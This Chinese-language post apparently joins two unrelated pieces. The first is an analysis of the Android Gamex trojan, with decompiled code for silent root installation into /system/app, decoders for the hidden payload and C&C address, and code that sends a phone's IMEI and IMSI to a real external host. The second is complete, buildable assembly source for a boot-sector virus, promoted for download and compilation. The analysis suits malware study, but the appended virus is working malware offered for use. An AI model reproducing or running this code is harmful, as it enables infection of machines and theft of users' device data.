    Intent localIntent = new Intent(paramContext, Settings.class);

    ComponentName localComponentName = paramContext.startService(localIntent);

  }

直接启动的是Settings.class服务,这个服务很简单,启动代码是这样的:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

public void onStart(Intent paramIntent, int paramInt)

  {

    super.onStart(paramIntent, paramInt);

    new Settings.1(this).start();

  }

class Settings$1 extends Thread

{

  public void run()

  {

    if ((!A.a) && (A.c()) && (A.d(A.context)))

    {

      A.a = 1;

      Settings localSettings = this.this$0;

      new C(localSettings).start();

    }

    while (true)

    {

      return;

      this.this$0.stopSelf();

    }

  }

}

[size=10.5000pt]A.a初始化为0,用来判断木马是否已经运行,A.c()只有一行代码判断SD卡是否已经准备好,为后面的病毒下载做准备,A.d()判断木马程序“com.android.setting”是否已经安装,如果没有安装且满足上面的条件就启动C线程来安装木马,C类的run()方法在Dex2jar中显示不了,在DJ Java Decompiler中可以看到完整的反编译的代码,线程通过context.getAssets().open(“logos.png”)读取木马文件,然后通过解密运算得到最终的apk安装文件,解密代码我用python实现如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

# -*- coding:utf-8 -*-

import sys

def main(filename):

    infile = file(filename,”rb”)

    outfile = file(filename[:-4]+”.apk”,”wb”)

    while 1:

        c = infile.read(1)

        if not c:

            break

        c = chr(ord(c) ^ 18)

        outfile.write(c)

    outfile.close()

    infile.close()

if __name__ == ‘__main__’:

main(sys.argv[1])

解密只是将整个文件与0x12异或而以,运行“python decrypt_apk.py logos.png”就会生成logos.apk木马文件。在上一步的解密完成后,调用了a(String)方法来安装木马,代码如下:

[mw_shl_code=python,true]protected static void a(String paramString)

  {

    try

    {

      Process localProcess = Runtime.getRuntime().exec(“su”);

      OutputStream localOutputStream = localProcess.getOutputStream();

      DataOutputStream localDataOutputStream = new DataOutputStream(localOutputStream);

      localDataOutputStream.writeBytes(“mount -o remount rw /system \n”);

      String str = “cp -i ” + paramString + ” /system/app/ComAndroidSetting.apk\n”;

      localDataOutputStream.writeBytes(str);

      Thread.sleep(20000L);

      localDataOutputStream.writeBytes(“chmod 644 /system/app/ComAndroidSetting.apk\n”);

      localDataOutputStream.writeBytes(“exit\n”);

      localDataOutputStream.flush();

      int i = localProcess.waitFor();

      return;

    }

    catch (IOException localIOException)

    {

      while (true)

        localIOException.printStackTrace();

    }

    catch (InterruptedException localInterruptedException)

    {

      while (true)

        localInterruptedException.printStackTrace();

    }

  }

邪恶的代码将整个程序复制到了“/system/app/”目录下,使其成为系统程序!在安装完成后运行如下代码来发送广播与停止Settings服务:

        ntent intent = new Intent(“kurhjfngjhfjghdfjgjjdh”);

        context.sendBroadcast(intent);

        Intent intent1 = new Intent(context, com/android/md5/Settings);

        boolean flag3 = context1.stopService(intent1);

[/mw_shl_code]

这个奇怪字符串的广播是用来被木马接收的,到这里捆绑部分的工作做完了,下面是木马真身上场了,将刚才解密出的logos.apk解包,使用dex2jar该干啥干啥后,查看“AndroidManifest.xml”文件发现木马没有界面,并且通过两个开机广播来运行的,如图2所示:

 

图 2

这也验证了SDBoost发送奇怪字符串广播的分析,看第一个广播接收者代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

public class B extends BroadcastReceiver

{

  public static final String q = “android.intent.action.BOOT_COMPLETED”;

  public static final String qx = “kurhjfngjhfjghdfjgjjdh”;

  public void onReceive(Context paramContext, Intent paramIntent)

  {

    if ((paramIntent.getAction().equals(“android.intent.action.BOOT_COMPLETED”)) || (paramIntent.getAction().equals(“kurhjfngjhfjghdfjgjjdh”)))

      A.b(paramContext);

  }

}

这个A.b()方法启动了Settings.class服务,这个服务里面启动了一个线程,可以找到前面分析线程的类似框架代码如下:

public void run()

  {

    try

    {

      this.this$0.d();

      sleep(30000L);

      if ((!A.a) && (A.c()) && (A.d(this.this$0)))

      {

        A.a = 1;

        Settings localSettings1 = this.this$0;

        new E(localSettings1).start();

        return;

      }

    }

    catch (InterruptedException localInterruptedException)

    {

      …

    }

  }

d()负责解码C&C(Control & Command)服务器地址并发送手机的隐私信息,解码代码为Settings的getUrl()方法,使用python解码实现为:

# -*- coding:utf-8 -*-

import sys

def decrypt2url(decryptedfile):

    f = file(decryptedfile,”r”)

    buf = f.read()

    bs = map(ord, buf) #将字节流存储为10进制的list

    sizz = len(bs)

    for i in range(0, sizz, 2):  #后面的字与前面的字交换存储

        if i >= sizz / 2 : break

        d = bs

        bs = bs[sizz – 1 – i]

        bs[sizz – 1 – i] = d

    ss = ”.join(map(chr,bs))

    bs2 = ss.split(‘,’) #用逗号分隔开

    bss = list(bs2)

    sout = ”

    for i in range(0, len(bss), 2):

        sout = sout + chr(int(bss))

    print sout

def main(filename):

    PASS = ”.join(chr(x) for x in [9, 5, 9, 8, 5]) #这个是解密的原子

    infile = file(filename,”rb”)

    outfile = file(filename[:-4]+”.txt”,”wb”)

    i = 0

    while 1:

        c = infile.read(1)

        if not c:

            break

        j = i % 5

        d = PASS[j]

        c = chr(ord(c) ^ ord(d))

        i = i + 1

        outfile.write(c)

    outfile.close()

    infile.close()

    decrypt2url(filename[:-4]+”.txt”)

if __name__ == ‘__main__’:

    main(sys.argv[1])

这段解密脚本首先将“logo.png”文件的每个字节与[9, 5, 9, 8, 5]解密原子进行异或,解出来后的内容如图3所示:

 

图 3

得到这个字符串后,将字符串首尾倒序排列一次,排列完毕后的每一个逗号分隔的数字为一个字母的ASCII码,然后取这些ASCII的偶数位得到最终的URL地址,另外,为了照顾使用JAVA的同学,解密代码我也用JAVA实现了一份,在附件中一起打包了,解密出的结果如图4所示:

 

图 4

这个网址直接访问是提示禁止的,在d()方法中,将getDeviceId()、getSubscriberId(),Build.MODEL,getApplicationInfo(str3, 128).metaData.getString(“CMP_PID”)的结果与其它字符组合得到最终的网址为“http://www.fineandroid.com/inputex/index.php?s=/Interface/keinter/a1/DeviceId/a2/SubscriberId/a3/MODEL/index/xian1234”,最后调用b(String)方法启动一个线程将信息发送出去,代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

public void run()

  {

    …

    HttpGet localHttpGet = new HttpGet(str);

    try

    {

      HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);

      if ((localHttpResponse.getStatusLine().getStatusCode() == 200) && (EntityUtils.toString(localHttpResponse.getEntity()).equals(“1”)))

      {

        SharedPreferences.Editor localEditor1 = this.this$0.getSharedPreferences(“tijiao”, 0).edit();

        SharedPreferences.Editor localEditor2 = localEditor1.putInt(“biaoji”, 1);

        boolean bool = localEditor1.commit();

      }

      return;

    }

    catch (ClientProtocolException localClientProtocolException)

    {

      …

    }

     …

  }

如果提交成功就保存到SharedPerferences中,我们构造字符串手动访问如图5所示:

 

图 5

继续回到刚才Settings.1线程,在做完这些工作后,又开始判断了,A.a判断木马是否已经运行,A.c()判断SD卡是否已经准备到位,A.d(Context)判断是否有安装“com.android.update”木马程序,如果没有安装且上面的条件满足,就开启一个E线程做工作,E线程启动就注册了两只广播接收者“android.intent.action.PACKAGE_ADDED”与“android.intent.action.PACKAGE_CHANGED”,广播接收为收到“Intent(“akjgikurhnfjghfkj”)”广播后就启动Settings.class服务,在完成这一步后,线程运行,解码出“com.android.update”木马程序,方法与上面“com.android.setting”代码是一样的,可以用前面的“decrypt_apk.py”脚本解密得出木马APK文件,解出来后调用a()方法来安装“com.android.update”木马。到这里,由B类开机广播接收者引发的木马安装与信息发送到这里就完了,看看另一个D类的开机广播接收者的代码,它的代码很简单,收到广播后,获取木马的包名,然后在a()方法中调用“pm install -r”来重新安装木马,这个“com.android.setting”木马就分析到这里,下面看看“com.android.update”。这也是Gamex木马的最核心部分,

这个“com.android.update”木马核心的启动由开机广播完成的,如图6所示:

 

图 6

广播接收者的代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

public class B extends BroadcastReceiver

{

  public static final String a = “akjgikurhnfjghfkj”;

  public static final String q = “android.intent.action.BOOT_COMPLETED”;

  public void onReceive(Context paramContext, Intent paramIntent)

  {

    if ((paramIntent.getAction().equals(“android.intent.action.BOOT_COMPLETED”)) || (paramIntent.getAction().equals(“akjgikurhnfjghfkj”)))

      A.boot(paramContext);

  }

}

在收到广播后,调用A类boot()方法启动了Updater.class服务,这个服务生了四个类来完成所有的木马工作,代码为:

public void onStart(Intent paramIntent, int paramInt)

  {

    super.onStart(paramIntent, paramInt);

    D localD = new D(this);

    this.activityThread = localD;

    F localF = new F(this);

    this.getSoftThread = localF;

    G localG = new G(this);

    this.downSoftThread = localG;

    H localH = new H(this);

    this.installSoftThread = localH;

  }

四个对象分工明确,我们慢慢来分析,第一个对象D为“卫兵”对象,负责“通风报信”的工作,在对象构造时注册了广播接收者D.1分别监听“”android.intent.action.SCREEN_OFF”与“android.intent.action.SCREEN_ON”,当后者被触发时就启动HOME进行来隐藏自己,前者被触发时就默默的收集用户安装的软件信息,步骤为D.1首先调用D对象M成员的d()方法来查询已经安装而没有运行的木马软件,M成员为D对象中的数据库查询操作对象,在D对象初始化的时候创建,接着调用D.f()方法获取正在运行的软件,并与M.d()方法返回的列表进行比较,如果找到未运行的程序,localPackageManager.getLaunchIntentForPackage(String)来获取Activity名称,并调用paramContext.startActivity(localIntent1)启动该程序,再调用M.j(String)方法来更新软件运行状态数据库,最后调用D.n(String)方法往C&C服务器发送信息,代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

public void n(String paramString)

  {

    String str1 = ((TelephonyManager)this.g.getSystemService(“phone”)).getDeviceId(); //获取IMEI

    if (str1 == null)

      str1 = “”;

    String str2 = String.valueOf(j());

    String str3 = String.valueOf(str2 + “inputex/index.php?s=/Interface/neiinter/a1/”);

    String str4 = str3 + str1 + “/nam/” + paramString;

    j(str4);

  }

j()方法用来解密Assets目录下的”icon.png”文件来获取C&C地址,依旧可以使用decrypt_url.py来解密,解密后的地址仍然是“http://www.fineandroid.com/”,组合生成URL后调用j(String)发送出去,方法与“com.android.android”是一样的,到这里,D对象就算了解了,下一个是F对象。F对象也很简单,它读取木马服务器上的木马列表,并将列表写入本地数据库中供木马查询,F.k()解得地址为“http://fineandroid.com/InstallApk/php4sam.php”,直接访问如图7所示:

 

图 7

这个木马作者是中国人,有没有?整个html内容的解读是由J.a(InputStream)完成的,这里限于篇幅就不帖出来了,最后得到的List数据是通过M.g(String,…)插入数据库的,在保存前调用了F.e(String)进行了简单的加密,我就不分析了,看看第三个G类,它负责木马的下载工作,核心的方法为loop(),首先调用M.C()检查没有下载的木马软件,如果有软件没有下载,就检查是否在WIFI环境下,如果条件都满足就new了一个P对象,后者调用K.d(String,…)开始下载,下载完成后调用M.h()设置木马的下载状态,这些工作都做完后让线程进入睡眠状态,WIFI状态下休息1分钟,非WIFI状态下休息5个小时。相应的代码如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

protected void loop()

  {

    NetworkInfo localNetworkInfo = ((ConnectivityManager)this.e.getSystemService(“connectivity”)).getActiveNetworkInfo();

    List localList;

    if ((localNetworkInfo != null) && (localNetworkInfo.isAvailable()) && (!this.d))

    {

      localList = this.h.c();

      if (localList.size() == 0)

        setSleepTime(60000L);  //如果没有软件要下载,就休息1分钟

    }

    while (true)

    {

      return;

      if (localNetworkInfo.getTypeName().equals(“WIFI”)) //是否在WIFI网络状态下

      {

        localIterator = localList.iterator();

        if (!localIterator.hasNext())

          continue;

        …

        Handler localHandler1 = this.f;

        new P(localContext1, str1, str2, “download/”, str3, localHandler1).start(); //开始下载

        this.d = 1;

        setSleepTime(60000L);  //下载完就休息1分钟

        continue;

      }

      …

      new P(localContext2, str4, str5, “download/”, str6, localHandler2).start();//开始下载

      this.d = 1;

      setSleepTime(18000000L); //休息5小时

      …

    }

  }

最后的H类是安装类,它没有做实质性的工作,只是隔一段时间发一生广播并更新一下已下载的木马软件状态到数据库中。到这里,整个Gamex木马就分析完了。

总结

通过对Gamex木马的分析,我们看到其中用到了代码捆绑、软件静默安装、URL提交与响应、开机广播,文件加解密等大量的代码,这些代码在Android程序员日常编码过程中是常见的,只有掌握好Android基础,把握程序的分析思路才能将Android木马看的通透。最后补上一张Gamex的流程图,方便大家理解

中国骇客云引导区病毒例程C,本站病毒可支持下载并进行编译~中国寒龙出品

引导区病毒样例
;制作方法:tasm boot.asm; tlink boot.asm;
;生成boot.exe,执行即可
.286
.model small
.code
;程序入口参数
;ax=内存高端地址 bx=7c00h 引导程序起始地址
;cx=0001h 表示从ch(00)磁道cl(01)扇区读出了本程序
;dx=00/80h 表示从dx(00:A驱)(80:C驱)读出了本程序
;ds=es=ss=cs=0 初始段值
OFF equ
VirusSize=OFF @@End-OFF @@Start
@@Start:
jmp short @@Begin
VirusFlag db ‘V’ ;病毒标志
@@BootData: ;这里有两个重要数据结构,不能是代码
org 50h ;病毒从Offset50h开始,病毒未用以上数据
@@Begin: ;但其它程序可能使用,故须保留
mov bx,7c00h
mov sp,bx ;设sp,使ss:sp=0:7c00h
sti
mov ax,ds:[413h] ;得到内存大小(0:413h单元存有以K计数的内存大小)
dec ax
dec ax
mov ds:[413h],ax ;将原内存大小减2K
mov cl,06
shl ax,cl ;计算高端内存地址
mov es,ax
xor di,di
mov si,sp
mov cx,VirusSize
cld
rep movsb ;把病毒搬移到高端地址里
push ax
mov di,OFF @@HighAddr
push di
retf ;跳到高端继续执行
@@HighAddr:
cli ;修改中断向量前,最好关中断
xchg ds:[13h*4+2],ax
mov cs:[OldInt13Seg],ax
mov ax,OFF @@NewInt13
xchg ds:[13h*4],ax
mov cs:[OldInt13Off],ax ;修改中断13h
push ds
pop es ;把es复位为0
cmp dl,80h ;是否从硬盘引导?
jz short @@ReadOldHardBoot
push dx ; 从软盘引导,则传染硬盘
mov dl,80h
call @@OptDisk ;调用传染模块
pop dx
@@ReadOldFlopyBoot: ;读出原软盘引导程序
mov ax,0201h
mov cx,79*100h+17 ;传染时将原引导程序保存在0面79道17扇区中
mov dh,00h
call @@CallInt13
jc short @@ReadOldFlopyBoot ;失败,继续读直到成功
@@ExecOldBoot:
cmp es:[bx.Flags],0aa55h
jnz @@ExecOldBoot
mov ah,02h
int 1ah ;取系统时间
cmp cx,22*100h+30 ;是否大于22:30分
jb @@ExitDisp ;未到,则不显示
lea si,VirusMsg
@@DispMsg:
mov al,cs:[si]
inc si
mov ah,0eh
int 10h ;显示al中的字符
or al,al
jnz @@DispMsg
xor ax,ax
int 16h
@@ExitDisp:
mov cx,0001h ;恢复cx初值
push es
push bx
retf ;去执行原引导程序
@@ReadOldHardBoot:
mov ax,0201h
mov cx,0002h ;传染时将原硬盘主引导程序保存在0面0道2扇区中
mov dh,00h
call @@CallInt13 ;读出
jc short @@ReadOldHardBoot ;失败,继续读直到成功
jmp short @@ExecOldBoot ;去执行原引导程序
@@NewInt13: ;新Int 13h(传染块)
cmp dx,0000h ;是软盘吗?
jnz short @@JmpOldInt13
cmp ah,02h
jnz short @@JmpOldInt13
cmp cx,0001h
jnz short @@JmpOldInt13
call @@OptDisk ;若发现读软盘扇区,则感染软盘
@@JmpOldInt13:
cli
JmpFar db 0eah ;远跳转指令
OldInt13Off dw ?
OldInt13Seg dw ?
@@CallInt13:
pushf ;模拟Int 13h指令
push cs
call @@JmpOldInt13
ret
@@OptDisk: ;传染dl表示的磁盘(dl-0 A: 80:C)
pusha
push ds
push es ;保存段址与通用寄存器
push cs
pop es
push cs
pop ds ;使ds=es=cs
mov bx,OFF OldBootSpace
mov ax,0201h
mov cx,0001h
mov dh,00h
call @@CallInt13 ;读原引导扇区
jc short @@OptOver
mov di,bx
cmp ds:[di.VirusFlag],’V’ ;判断是否已经有病毒?
jz short @@OptOver ;若有,则退出
cmp dl,00h
jz short @@IsOptFlopyDisk
@@IsOptHardDisk:
mov cx,0002h ;若是硬盘,保存在0面0道2扇区
jmp short @@SaveOldBoot
@@IsOptFlopyDisk:
mov cx,79*100h+17 ;若是软盘,保存在0面79道17扇区
@@SaveOldBoot:
mov ax,0301h
mov dh,0h
call @@CallInt13 ;保存原引导扇区
jc short @@OptOver
mov si,OFF @@Start
cld
movsw
movsb ;修改原扇区首指令(Jmp near 3字节)
mov di,OFF @@Begin+200h
mov si,OFF @@Begin
mov cx,OFF @@End-OFF @@Begin
cld
rep movsb ;修改原引导扇区指令cx字节
mov ax,0301h
mov cx,0001h
mov dh,00h
call @@CallInt13 ;写回已经被修改了的引导程序
@@OptOver: ;退出传染
pop es
pop ds ;恢复段址与通用寄存器
popa
ret ;以下是病毒要显示的信息,与病毒版本信息
VirusMsg db 0dh,0ah,07h,’Night is deep,you must go sleep!’,0dh,0ah,0
db ‘Night Sleep ver 1.0,by whg 2001.5.5’,0
@@End:
org 1feh
Flags dw 0aa55h ;引导扇区有效标志
OldBootSpace db 210h dup(?) ;定义缓冲区
@@Install:
xor ax,ax
mov ds,ax
cli
mov ax,ds:[13h*4]
mov cs:[OldInt13Off],ax
mov ax,ds:[13h*4+2]
mov cs:[OldInt13Seg],ax
mov dl,80h
call @@OptDisk
mov ax,4c00h
int 21h
End @@Install